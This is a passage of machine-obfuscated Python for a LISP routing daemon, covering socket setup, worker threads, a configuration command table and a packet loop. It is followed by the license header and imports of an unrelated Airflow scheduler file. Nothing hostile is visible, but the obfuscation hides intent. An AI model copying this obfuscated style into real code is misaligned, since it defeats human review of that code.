if 62 - 62: OOooOOo + Oo0Ooo % iIii1I11I1II1 / iIii1I11I1II1 . ooOoO0o . IiII
if 21 - 21: OoO0O00 - Ii1I - I1IiiI / OoOoOO00
if 48 - 48: OoooooooOO
if 16 - 16: OoOoOO00 * I1ii11iIi11i * I1ii11iIi11i / O0 * i11iIiiIii
if 64 - 64: iII111i * I1ii11iIi11i % II111iiii - OoOoOO00 + I1ii11iIi11i
if 62 - 62: OoOoOO00 % o0oOOo0O0Ooo % I1IiiI + IiII . OoO0O00
if 48 - 48: I1IiiI * i11iIiiIii % II111iiii
def ii1I ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 61 - 61: iIii1I11I1II1 - I11i / iII111i * I11i % Ii1I % iII111i
if 63 - 63: OOooOOo % iIii1I11I1II1
if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
if 89 - 89: iII111i . i11iIiiIii * O0
for oO0OOOO0 in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for Iii in oO0OOOO0 : del ( Iii )
if 35 - 35: IiII . OoooooooOO / OOooOOo
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
o0OO00oo0O ( )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
IiIIiii1I ( lisp_raw_socket )
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
oOOoo00O0O = threading . Timer ( 60 , ii1I ,
[ lisp_raw_socket ] )
oOOoo00O0O . start ( )
return
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
def i111I11I ( ) :
global Ii1iI , Oo0o , I1Ii11I1Ii1i
global o0oOoO00o , i1 , O0ooo00OOo00
global Oo , OOO0o0o
global iIiiI1
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
if 41 - 41: IiII
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
if 10 - 10: II111iiii . O0
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 31 - 31: oO0o / i11iIiiIii / O0
if 39 - 39: I1IiiI + Oo0Ooo
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
O0oooOoO = lisp . bold ( "AWS RTR" , False )
Oo0OoO00oOO0o = None
for oo0 in [ "eth0" , "ens5" ] :
Oo0OoO00oOO0o = lisp . lisp_get_interface_address ( oo0 )
if ( Oo0OoO00oOO0o != None ) : break
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if ( Oo0OoO00oOO0o != None ) :
iIiiI1 = Oo0OoO00oOO0o
iI1Iii = Oo0OoO00oOO0o . print_address_no_iid ( )
lisp . lprint ( "{} using RLOC {} on {}" . format ( O0oooOoO , iI1Iii , oo0 ) )
else :
iI1Iii = iIiiI1 . print_address_no_iid ( )
lisp . lprint ( "{} cannot obtain RLOC, using {}" . format ( O0oooOoO , iI1Iii ) )
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
I1i1II1 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( I1i1II1 ,
str ( Ooo ) )
Ii1iI = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
Oo = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 89 - 89: OoO0O00 / OoO0O00
Oo0o [ 0 ] = I1Ii11I1Ii1i
if 1 - 1: I1ii11iIi11i . i11iIiiIii
Oo0o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o [ 2 ] = Ii1iI
if 74 - 74: O0 + OoooooooOO / oO0o / OoOoOO00 . I1ii11iIi11i % oO0o
if 34 - 34: i1IIi . I1IiiI
if 6 - 6: I1Ii111 % oO0o % Ii1I
if 63 - 63: O0 . I1IiiI . O0 * iIii1I11I1II1
if 92 - 92: oO0o / OOooOOo . I1ii11iIi11i
if 30 - 30: Ii1I . I1ii11iIi11i / OOooOOo
if 2 - 2: IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
o0oOoO00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
o0oOoO00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o . append ( o0oOoO00o )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
OOO0o0o = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if 12 - 12: I1ii11iIi11i / Ii1I
if ( lisp . lisp_is_raspbian ( ) == False ) :
i1 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
Ii1I1 = os . getenv ( "LISP_PCAP_THREADS" )
Ii1I1 = 1 if ( Ii1I1 == None ) else int ( Ii1I1 )
O0oo00oOOO0o = os . getenv ( "LISP_WORKER_THREADS" )
O0oo00oOOO0o = 0 if ( O0oo00oOOO0o == None ) else int ( O0oo00oOOO0o )
if 5 - 5: o0oOOo0O0Ooo / I1IiiI % Ii1I . IiII
if 86 - 86: i1IIi * OoOoOO00 . O0 - Ii1I - o0oOOo0O0Ooo - OoOoOO00
if 47 - 47: OOooOOo + I11i
if 50 - 50: I1Ii111 + I1ii11iIi11i
for i1Ii in range ( Ii1I1 ) :
OOOooOOOOOOOO = lisp . lisp_thread ( "pcap-{}" . format ( i1Ii ) )
OOOooOOOOOOOO . thread_number = i1Ii
OOOooOOOOOOOO . number_of_pcap_threads = Ii1I1
OOOooOOOOOOOO . number_of_worker_threads = O0oo00oOOO0o
O0ooo00OOo00 . append ( OOOooOOOOOOOO )
threading . Thread ( target = ii , args = [ OOOooOOOOOOOO ] ) . start ( )
if 81 - 81: OoooooooOO + i1IIi
if 65 - 65: iII111i . oO0o - Ii1I
if 93 - 93: O0
if 4 - 4: I1IiiI / I1IiiI
if 82 - 82: I11i / ooOoO0o * I11i % i11iIiiIii * II111iiii
if 83 - 83: OoO0O00 + OOooOOo - o0oOOo0O0Ooo + iIii1I11I1II1 % Oo0Ooo
for i1Ii in range ( O0oo00oOOO0o ) :
OOOooOOOOOOOO = lisp . lisp_thread ( "worker-{}" . format ( i1Ii ) )
O0ooo00OOo00 . append ( OOOooOOOOOOOO )
threading . Thread ( target = I1III111i , args = [ OOOooOOOOOOOO ] ) . start ( )
if 23 - 23: o0oOOo0O0Ooo + Ii1I % OoOoOO00 % I1IiiI % OoooooooOO
if 78 - 78: OoO0O00 / Oo0Ooo - iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
if 93 - 93: ooOoO0o
lisp . lisp_load_checkpoint ( )
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
oOOoo00O0O = threading . Timer ( 60 , ii1I ,
[ o0oOoO00o ] )
oOOoo00O0O . start ( )
return ( True )
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
def I11 ( ) :
if 18 - 18: iIii1I11I1II1
if 30 - 30: O0 + OOooOOo % Oo0Ooo . i1IIi
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
lisp . lisp_close_socket ( Oo0o [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o [ 1 ] , "" )
lisp . lisp_close_socket ( Ii1iI , "lisp-rtr" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
lisp . lisp_close_socket ( OOO0o0o , "" )
lisp . lisp_close_socket ( Oo , "lispers.net-itr" )
o0oOoO00o . close ( )
return
if 77 - 77: i1IIi + OoO0O00 . I1IiiI * OOooOOo / IiII / Ii1I
if 84 - 84: OoO0O00 / iIii1I11I1II1
if 33 - 33: i1IIi / I1Ii111 - i1IIi . Oo0Ooo
if 18 - 18: Oo0Ooo / O0 + iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
def o0oO0o00O ( kv_pair ) :
global Oo0o
global Ooo
if 6 - 6: OoooooooOO / i11iIiiIii / I1Ii111
lispconfig . lisp_map_resolver_command ( kv_pair )
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ Oo0o , Ooo ] )
lisp . lisp_test_mr_timer . start ( )
if 34 - 34: I1Ii111 - OOooOOo
return
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
def iiI1 ( kv_pair ) :
global I1Ii11I1Ii1i , o0oOoO00o , Ooo
if 50 - 50: ooOoO0o * OoOoOO00 + I1ii11iIi11i - i11iIiiIii + Oo0Ooo * I1ii11iIi11i
i11II = lisp . lisp_rloc_probing
if 69 - 69: I1Ii111 - i1IIi % iII111i . OOooOOo - OOooOOo
if 65 - 65: OOooOOo + II111iiii
if 61 - 61: i11iIiiIii * oO0o % Oo0Ooo * I1Ii111 - OoooooooOO - OoO0O00
if 83 - 83: ooOoO0o / OOooOOo
lispconfig . lisp_xtr_command ( kv_pair )
if 39 - 39: IiII + I11i
if 9 - 9: I1IiiI % I11i . Oo0Ooo * I1IiiI
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
if 20 - 20: OoOoOO00 * iII111i
if 19 - 19: OoooooooOO
if ( i11II == False and lisp . lisp_rloc_probing ) :
o00O0OoO = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
None , o0oOoO00o ]
lisp . lisp_start_rloc_probe_timer ( 1 , o00O0OoO )
oO0Oo = { "type" : "itr-crypto-port" , "port" : Ooo }
lisp . lisp_write_to_dp_socket ( oO0Oo )
if 76 - 76: OoO0O00 * oO0o
if 63 - 63: II111iiii . II111iiii + I1ii11iIi11i + OOooOOo + O0 . Ii1I
if 1 - 1: O0 * i11iIiiIii - ooOoO0o - Ii1I
if 94 - 94: OoO0O00 + IiII + ooOoO0o
if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
if 99 - 99: I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - iIii1I11I1II1 - Ii1I
if 31 - 31: IiII - OoO0O00 / OOooOOo . i1IIi / Ii1I
o0o000o = {
"lisp xtr-parameters" : [ iiI1 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ o0oO0o00O , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiii , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
if 26 - 26: iIii1I11I1II1 * o0oOOo0O0Ooo . I11i
if 10 - 10: I1Ii111 * oO0o % Oo0Ooo - I11i % Oo0Ooo
if 65 - 65: iII111i * iIii1I11I1II1 / O0 . I11i
if 94 - 94: Oo0Ooo . ooOoO0o * i11iIiiIii - o0oOOo0O0Ooo . iII111i
if 98 - 98: OOooOOo + Ii1I
if 52 - 52: Oo0Ooo / OoOoOO00 - I1Ii111 . iII111i
def iiI11Ii1i ( lisp_socket ) :
if 100 - 100: iII111i + I11i + ooOoO0o + iII111i / i1IIi
if 74 - 74: O0 % OoooooooOO * Oo0Ooo + OOooOOo * iII111i
if 100 - 100: OOooOOo + Ii1I * o0oOOo0O0Ooo + II111iiii
if 70 - 70: Oo0Ooo * iIii1I11I1II1
O00Ooo0ooo0 , oOO0OooOo , i1I , O0O0oOOo0O = lisp . lisp_receive ( lisp_socket , False )
oO00o0O00o = lisp . lisp_trace ( )
if ( oO00o0O00o . decode ( O0O0oOOo0O ) == False ) : return
if 98 - 98: ooOoO0o . OOooOOo
if 60 - 60: OoO0O00 - i1IIi . OOooOOo + OOooOOo * OOooOOo + Ii1I
if 66 - 66: OOooOOo * OOooOOo / iIii1I11I1II1 + OoOoOO00 . OOooOOo
if 51 - 51: I1ii11iIi11i
if 58 - 58: Ii1I % OoooooooOO
oO00o0O00o . rtr_cache_nat_trace ( oOO0OooOo , i1I )
if 49 - 49: I1ii11iIi11i + O0 . Ii1I * OoooooooOO
if 82 - 82: I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if ( i111I11I ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
i1IiiI = [ I1Ii11I1Ii1i , Ii1iI ,
Oo , OOO0o0o ]
O0OOO0 = [ I1Ii11I1Ii1i ] * 3
if 61 - 61: ooOoO0o . i11iIiiIii + oO0o
while ( True ) :
try : iIi , oo0ooO , oO00oo0o00o0o = select . select ( i1IiiI , [ ] , [ ] )
except : break
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if 90 - 90: Oo0Ooo * I1IiiI
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
if ( lisp . lisp_ipc_data_plane and Oo in iIi ) :
lisp . lisp_process_punt ( Oo , Oo0o ,
Ooo )
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if ( OOO0o0o in iIi ) :
iiI11Ii1i ( OOO0o0o )
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
if ( I1Ii11I1Ii1i in iIi ) :
O00Ooo0ooo0 , oOO0OooOo , i1I , O0O0oOOo0O = lisp . lisp_receive ( O0OOO0 [ 0 ] ,
False )
if ( oOO0OooOo == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( O0O0oOOo0O [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 22 - 22: oO0o * iII111i
if ( lisp . lisp_is_rloc_probe_reply ( O0O0oOOo0O [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
lisp . lisp_parse_packet ( O0OOO0 , O0O0oOOo0O , oOO0OooOo , i1I )
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if ( Ii1iI in iIi ) :
O00Ooo0ooo0 , oOO0OooOo , i1I , O0O0oOOo0O = lisp . lisp_receive ( Ii1iI , True )
if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
if ( oOO0OooOo == "" ) : break
if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO
if ( O00Ooo0ooo0 == "command" ) :
if ( O0O0oOOo0O == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 51 - 51: OOooOOo / ooOoO0o + OoO0O00 % OoOoOO00 / Ii1I
if ( O0O0oOOo0O . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( O0O0oOOo0O )
continue
if 25 - 25: o0oOOo0O0Ooo
lispconfig . lisp_process_command ( Ii1iI , O00Ooo0ooo0 ,
O0O0oOOo0O , "lisp-rtr" , [ o0o000o ] )
elif ( O00Ooo0ooo0 == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Ii1iI , O0O0oOOo0O )
elif ( O00Ooo0ooo0 == "data-packet" ) :
Ii1ii111i1 ( O0O0oOOo0O , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( O0O0oOOo0O [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 25 - 25: ooOoO0o * iII111i / I11i / I11i % o0oOOo0O0Ooo
if ( lisp . lisp_is_rloc_probe_reply ( O0O0oOOo0O [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 19 - 19: oO0o - iIii1I11I1II1 / ooOoO0o . OoO0O00 * O0 - O0
lisp . lisp_parse_packet ( Oo0o , O0O0oOOo0O , oOO0OooOo , i1I )
if 41 - 41: i1IIi - I1IiiI
if 48 - 48: I1IiiI - II111iiii / OoO0O00 + I1IiiI
if 5 - 5: O0
if 75 - 75: I1Ii111 + iIii1I11I1II1
I11 ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
